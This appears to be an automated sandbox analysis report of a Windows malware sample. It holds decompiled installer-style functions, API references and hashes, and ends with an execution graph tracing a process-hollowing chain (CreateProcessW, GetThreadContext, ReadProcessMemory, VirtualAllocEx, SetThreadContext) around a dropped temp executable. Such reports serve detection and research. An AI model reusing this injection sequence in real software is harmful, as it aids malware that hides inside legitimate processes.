                                  Uniqueness Score: -1.00%

                                  Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00404D10(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406544(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406544(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406544(_t44, _t50, 0x423708, 0x423708, _a8);
				wsprintfW(_t34 + lstrlenW(0x423708) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291f8, _a4, 0x423708);
			}



















                                  0x00404d19
                                  0x00404d1e
                                  0x00404d26
                                  0x00404d27
                                  0x00404d34
                                  0x00404d3c
                                  0x00404d3d
                                  0x00404d3f
                                  0x00404d41
                                  0x00404d43
                                  0x00404d46
                                  0x00404d46
                                  0x00404d4d
                                  0x00404d53
                                  0x00404d53
                                  0x00404d5a
                                  0x00404d61
                                  0x00404d64
                                  0x00404d67
                                  0x00404d67
                                  0x00404d6b
                                  0x00404d7b
                                  0x00404d7d
                                  0x00404d80
                                  0x00404d29
                                  0x00404d29
                                  0x00404d30
                                  0x00404d30
                                  0x00404d88
                                  0x00404d93
                                  0x00404da9
                                  0x00404dba
                                  0x00404dd6

                                  APIs
                                  • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                  • wsprintfW.USER32 ref: 00404DBA
                                  • SetDlgItemTextW.USER32 ref: 00404DCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
                                  • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                                  • Opcode Fuzzy Hash: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
                                  • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00405DD6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                  0x00405dd7
                                  0x00405de4
                                  0x00405de5
                                  0x00405df0
                                  0x00405df8
                                  0x00405df8
                                  0x00405e00

                                  APIs
                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-3916508600
                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                  • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                  • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x420ec0 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42a22c) {
							_t3 = CreateDialogParamW( *0x42a220, 0x6f, 0, E00402F93, 0);
							 *0x420ec0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406910(0);
					}
				} else {
					_t6 =  *0x420ec0;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420ec0 = 0;
					return _t6;
				}
			}






                                  0x00403020
                                  0x00403040
                                  0x0040304a
                                  0x00403056
                                  0x00403067
                                  0x00403070
                                  0x00000000
                                  0x00403075
                                  0x0040307c
                                  0x00403042
                                  0x00403049
                                  0x00403049
                                  0x00403022
                                  0x00403022
                                  0x00403029
                                  0x0040302c
                                  0x0040302c
                                  0x00403032
                                  0x00403039
                                  0x00403039

                                  APIs
                                  • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                  • GetTickCount.KERNEL32 ref: 0040304A
                                  • CreateDialogParamW.USER32 ref: 00403067
                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                  • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                                  • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                  • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E004054DD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236f4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236f4 = _t16;
							E00404E9E();
						}
						L11:
						return CallWindowProcW( *0x4236fc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E1E(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044AF(0x413);
				return 0;
			}





                                  0x004054e1
                                  0x004054eb
                                  0x00405507
                                  0x00405529
                                  0x0040552c
                                  0x00405532
                                  0x0040553c
                                  0x0040553d
                                  0x0040553f
                                  0x00405545
                                  0x00405545
                                  0x0040554f
                                  0x00000000
                                  0x0040555d
                                  0x00405514
                                  0x0040554c
                                  0x0040554c
                                  0x00000000
                                  0x0040554c
                                  0x00405520
                                  0x00405522
                                  0x00000000
                                  0x00405522
                                  0x004054f1
                                  0x00000000
                                  0x00000000
                                  0x004054f8
                                  0x00000000

                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 0040550C
                                  • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                                    • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                  • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                  • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                  • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E004063D5(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E00406374(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                  0x004063e3
                                  0x004063e5
                                  0x004063fd
                                  0x00406402
                                  0x00406407
                                  0x00406445
                                  0x00406445
                                  0x00406409
                                  0x0040641b
                                  0x00406426
                                  0x0040642c
                                  0x00406437
                                  0x00000000
                                  0x00000000
                                  0x00406437
                                  0x0040644b

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,004226E8,00000000,?,?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,?,?,0040663C,80000002), ref: 0040641B
                                  • RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,004226E8), ref: 00406426
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, xrefs: 004063DC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                  • API String ID: 3356406503-60066589
                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                  • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                  • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403B21() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216cc;
				_t3 = E00403B06(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216cc =  *0x4216cc & 0x00000000;
				return _t3;
			}







                                  0x00403b22
                                  0x00403b2a
                                  0x00403b31
                                  0x00403b34
                                  0x00403b34
                                  0x00403b36
                                  0x00403b3b
                                  0x00403b42
                                  0x00403b48
                                  0x00403b4c
                                  0x00403b4d
                                  0x00403b55

                                  APIs
                                  • FreeLibrary.KERNEL32(?,7620FAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                                  • GlobalFree.KERNEL32 ref: 00403B42
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-3916508600
                                  • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                  • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                                  • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                  • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405F5C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                  0x00405f6c
                                  0x00405f6e
                                  0x00405f71
                                  0x00405f9d
                                  0x00405f76
                                  0x00405f7f
                                  0x00405f84
                                  0x00405f8f
                                  0x00405f92
                                  0x00405fae
                                  0x00405f94
                                  0x00405f9b
                                  0x00000000
                                  0x00405f9b
                                  0x00405fa7
                                  0x00405fab
                                  0x00405fab
                                  0x00405fa5
                                  0x00000000

                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F84
                                  • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                  • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                  • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                  • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:51.7%
                                  Dynamic/Decrypted Code Coverage:96.8%
                                  Signature Coverage:23.4%
                                  Total number of Nodes:94
                                  Total number of Limit Nodes:8
                                  execution_graph 385 9c1000 GetCommandLineW CommandLineToArgvW CreateFileW 386 9c1040 GetFileSize VirtualAlloc ReadFile 385->386 387 9c1078 385->387 386->387 387->387 388 27207dd 400 27206c7 GetPEB 388->400 390 2720842 391 272099a CreateFileW 390->391 392 27209c1 391->392 393 27209bf 391->393 392->393 394 27209d4 VirtualAlloc 392->394 394->393 395 27209ee ReadFile 394->395 395->393 396 2720a06 FindCloseChangeNotification 395->396 397 2720a17 396->397 401 2720d88 397->401 400->390 415 27206c7 GetPEB 401->415 403 2720ddf 404 2720eca 403->404 406 2720ed7 403->406 414 2720a22 ExitProcess 403->414 416 27210b0 404->416 406->414 437 2720267 406->437 408 2720fdd 409 272104a 408->409 410 2720267 11 API calls 408->410 408->414 411 2720267 11 API calls 409->411 410->408 412 2721069 411->412 412->414 446 27201b6 412->446 415->403 455 27206c7 GetPEB 416->455 418 27210be 419 27211ec CreateProcessW 418->419 436 27211c7 418->436 420 2721203 GetThreadContext 419->420 419->436 421 2721226 ReadProcessMemory 420->421 420->436 422 272124a 421->422 421->436 423 272127d VirtualAllocEx 422->423 456 2720368 422->456 424 27212a7 423->424 423->436 426 2720267 11 API calls 424->426 428 27212bd 426->428 427 2721271 427->423 427->436 429 2721317 428->429 430 2720267 11 API calls 428->430 428->436 431 2720267 11 API calls 429->431 430->428 432 2721331 431->432 433 272133a SetThreadContext 432->433 432->436 434 272135f 433->434 433->436 435 27201b6 11 API calls 434->435 435->436 436->414 438 2720282 437->438 439 2720706 GetPEB 438->439 440 27202a3 439->440 441 2720335 440->441 442 27202ab 440->442 490 2720180 441->490 444 2720402 10 API calls 442->444 445 272031c 444->445 445->408 447 27201d1 446->447 448 2720706 GetPEB 447->448 449 27201f2 448->449 450 27201f6 449->450 451 272023c 449->451 453 2720402 10 API calls 450->453 493 2720192 451->493 454 2720231 453->454 454->414 455->418 457 272037b 456->457 465 2720706 GetPEB 457->465 459 272039c 460 27203a0 459->460 461 27203e6 459->461 467 2720402 GetPEB 460->467 481 27201a4 461->481 464 27203db 464->427 466 2720729 465->466 466->459 468 2720467 467->468 484 2720744 GetPEB 468->484 471 27204ec 472 27204fd VirtualAlloc 471->472 477 27205c2 471->477 473 2720513 ReadFile 472->473 472->477 474 2720528 VirtualAlloc 473->474 473->477 474->477 478 2720549 474->478 475 2720600 VirtualFree 476 272060b 475->476 476->464 477->475 477->476 478->477 479 27205b1 FindCloseChangeNotification 478->479 480 27205b5 VirtualFree 478->480 479->480 480->477 482 2720402 10 API calls 481->482 483 27201ae 482->483 483->464 485 2720757 484->485 487 27204db CreateFileW 485->487 488 2720616 GetPEB 485->488 487->471 487->477 489 2720641 488->489 489->485 491 2720402 10 API calls 490->491 492 272018a 491->492 492->445 494 2720402 10 API calls 493->494 495 272019c 494->495 495->454

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
